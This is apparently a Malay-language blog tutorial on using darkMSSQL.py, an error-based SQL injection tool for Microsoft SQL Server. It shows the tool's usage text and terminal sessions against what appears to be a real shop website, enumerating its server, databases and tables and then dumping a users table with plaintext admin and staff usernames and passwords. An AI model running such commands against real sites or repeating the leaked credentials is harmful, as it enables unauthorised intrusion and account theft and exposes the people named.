Hari ini aku nak tunjukkan macam mana cara menggunakan darkMSSQL.py…
benda ni digunakan untuk MSSQL database yang ade error..
Aku jarang jumpa database MSSQL yang ada error..
Kalau jumpa pun, nasib2 je..
Apa2 pun, jom kita tengok macam mana nak gunakan darkMSSQL.py ni..
Usage: ./darkMSSQL.py [options] rsauron[@]gmail[dot]com darkc0de.com Modes: Define: --info Gets MySQL server configuration only. Define: --dbs Shows all databases user has access too. Define: --schema Enumerate Information_schema Database. Define: --dump Extract information from a Database, Table and Column. Define: --insert Insert data into specified db, table and column(s). Required: Define: -u URL "www.site.com/news.asp?id=2" or "www.site.com/index.asp?id=news'" Mode dump and schema options: Define: -D "database_name" Define: -T "table_name" Define: -C "column_name,column_name..." Optional: Define: -p "127.0.0.1:80 or proxy.txt" Define: -o "ouput_file_name.txt" Default is darkMSSQLlog.txt Define: -r "-r 20" this will make the script resume at row 20 during dumping Define: --cookie "cookie_file.txt" Define: --debug Prints debug info to terminal. Ex: ./darkMSSQL.py --info -u "www.site.com/news.asp?id=2" Ex: ./darkMSSQL.py --dbs -u "www.site.com/news.asp?id=2" Ex: ./darkMSSQL.py --schema -u "www.site.com/news.asp?id=2" -D dbname Ex: ./darkMSSQL.py --dump -u "www.site.com/news.asp?id=2" -D dbname -T tablename -C username,password Ex: ./darkMSSQL.py -u "www.site.com/news.asp?news=article'" -D dbname -T table -C user,pass --insert -D dbname -T table -C darkuser,darkpass samurai@AnGry-Milw0rM:~/Desktop$ python darkMSSQL.py --info -u www.mylittletail.com/mylittletail/web/sub_box_ID1.asp?item_id=2003 |------------------------------------------------| | rsauron[@]gmail[dot]com v2.0 | | 10/2008 darkMSSQL.py | | -MSSQL Error Based Database Enumeration | | -MSSQL Server Information Enumeration | | -MSSQL Data Extractor | | Usage: darkMSSQL.py [options] | | [Public Beta] -h help darkc0de.com | |------------------------------------------------| [+] URL:http://www.mylittletail.com/mylittletail/web/sub_box_ID1.asp?item_id=2003 [+] 00:19:25 [+] Cookie: None [+] Proxy Not Given [+] Displaying information about MSSQL host! [+] @@VERSION: Microsoft SQL Server 2000 - 8.00.2039 (Intel X86) May 3 2005 23:18:38 Copyright (c) 1988-2003 Microsoft Corporation Enterprise Edition on Windows NT 5.2 (Build 3790: Service Pack 2) [+] USER: mylittletail_usr [+] DB_NAME(): mylittletail_db [+] HOST_NAME(): SERVER439 [+] Script detected Microsoft SQL Version: 2000 [+] Checking to see if we can view password hashs... Nope! [-] [00:19:26] [-] Total URL Requests 5 [-] Done Don't forget to check darkMSSQLlog.txt samurai@AnGry-Milw0rM:~/Desktop$ python darkMSSQL.py --dbs -u www.mylittletail.com/mylittletail/web/sub_box_ID1.asp?item_id=2003 |------------------------------------------------| | rsauron[@]gmail[dot]com v2.0 | | 10/2008 darkMSSQL.py | | -MSSQL Error Based Database Enumeration | | -MSSQL Server Information Enumeration | | -MSSQL Data Extractor | | Usage: darkMSSQL.py [options] | | [Public Beta] -h help darkc0de.com | |------------------------------------------------| [+] URL: http://www.mylittletail.com/mylittletail/web/sub_box_ID1.asp?item_id=2003 [+] 00:19:39 [+] Cookie: None [-] Proxy Not Given [+] Displaying list of all databases on MSSQL host! [0] mylittletail_db [1] master [2] tempdb [3] model [4] msdb [5] pubs [6] Northwind [7] lotteryuk_db [8] mylittletail_db [9] sailor_db [-] 00:19:41 [-] Total URL Requests 11 [-] Done Don't forget to check darkMSSQLlog.txt samurai@AnGry-Milw0rM:~/Desktop$ python darkMSSQL.py --schema -D mylittletail_db -u www.mylittletail.com/mylittletail/web/sub_box_ID1.asp?item_id=2003 |------------------------------------------------| | rsauron[@]gmail[dot]com v2.0 | | 10/2008 darkMSSQL.py | | -MSSQL Error Based Database Enumeration | | -MSSQL Server Information Enumeration | | -MSSQL Data Extractor | | Usage: darkMSSQL.py [options] | | [Public Beta] -h help darkc0de.com | |------------------------------------------------| [+] URL:http://www.mylittletail.com/mylittletail/web/sub_box_ID1.asp?item_id=2003 [+] 00:31:03 [+] Cookie: None [+] Proxy Not Given [+] Displaying tables inside DB: mylittletail_db [0] addon [1] category [2] country [3] delivery [4] discount [5] dtproperties [6] featured_category [7] featured_item [8] featured_maincategory [9] item_packages [10] item_questions [11] items [12] items_addon [13] items_also [14] main_items [15] member [16] message [17] millkak [18] newsletter_counter [19] newsletter_log [20] newsletter_master [21] order [22] order_item [23] subcategory [24] sysconstraints [25] syssegments [26] t_jiaozhu [27] temp_order [28] temp_order_id [29] ticketing [30] uploadform [31] userlog [32] users [-] [00:31:09] [-] Total URL Requests 34 [-] Done Don't forget to check darkMSSQLlog.txt samurai@AnGry-Milw0rM:~/Desktop$ python darkMSSQL.py --dump -D mylittletail_db -T users -C username,password -u www.mylittletail.com/mylittletail/web/sub_box_ID1.asp?item_id=2003 |------------------------------------------------| | rsauron[@]gmail[dot]com v2.0 | | 10/2008 darkMSSQL.py | | -MSSQL Error Based Database Enumeration | | -MSSQL Server Information Enumeration | | -MSSQL Data Extractor | | Usage: darkMSSQL.py [options] | | [Public Beta] -h help darkc0de.com | |------------------------------------------------| [+] URL:http://www.mylittletail.com/mylittletail/web/sub_box_ID1.asp?item_id=2003 [+] 00:27:52 [+] Cookie: None [+] Proxy Not Given [0] 20admin08:72hu1ge9 admin [1] yennee08:01yen04nee admin [2] jolen18e:dedica18 staff [3] jason:11jas37on5 admin [4] katrina03:031983 staff [5] zack09:20gift09 staff [6] 3sales69:3moneytail69 staff [-] [00:27:54] [-] Total URL Requests 8 [-] Done Don't forget to check darkMSSQLlog.txt
p/s : thanks to rsauron from darkc0de for this script.. nice one mate ! 🙂